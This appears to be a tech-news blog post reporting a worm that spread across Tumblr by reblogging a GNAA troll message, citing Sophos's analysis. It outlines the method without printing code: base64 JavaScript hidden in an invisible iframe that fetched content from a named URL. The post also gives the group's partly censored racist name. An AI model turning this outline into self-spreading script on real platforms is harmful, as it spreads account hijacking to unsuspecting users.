Worm. Such a little word, but it belies a lot of grief, particularly for Tumblr, which saw several of its sites blighted when a worm spread like lightning on Monday.

The digital vandalism showed up as a headshot photo beside some… erm… provocative text branded with the logo from GNAA. Short for the Gay N***** Association of America, the GNAA is a particularly vocal group of Internet trolls that takes aim at bloggers with racist posts.

Caution: Foul language ahead. Put the little ones in the next room, should you decide to scroll down. 

SophosLabs did a sweep of the incident and figured out how the worm spread so quickly.

Tumblr has a reblogging feature that kicked in whenever someone (who was already logged in) visited an infected page. Those who hadn’t signed in simply got directed to a login page, while everyone else had the GNAA notice reblogged on their own Tumblr — including sites like The Verge. Explains Sophos:

The Base 64 string was actually encoded JavaScript, hidden inside an iFrame that was invisible to the naked eye, that dragged content from a url. Once decoded, the intention of the code becomes more clear.

For now, it seems Sophos got a handle on things by blocking access to the strangled.net url. For more “geekinese” on how the malicious Javascript worked and how it got past Tumblr, visit the source link.

Have you seen the GNAA notice, or had the worm affect your Tumblr account? Let us know in the comments.

[Via Sophos’ Naked Security blog]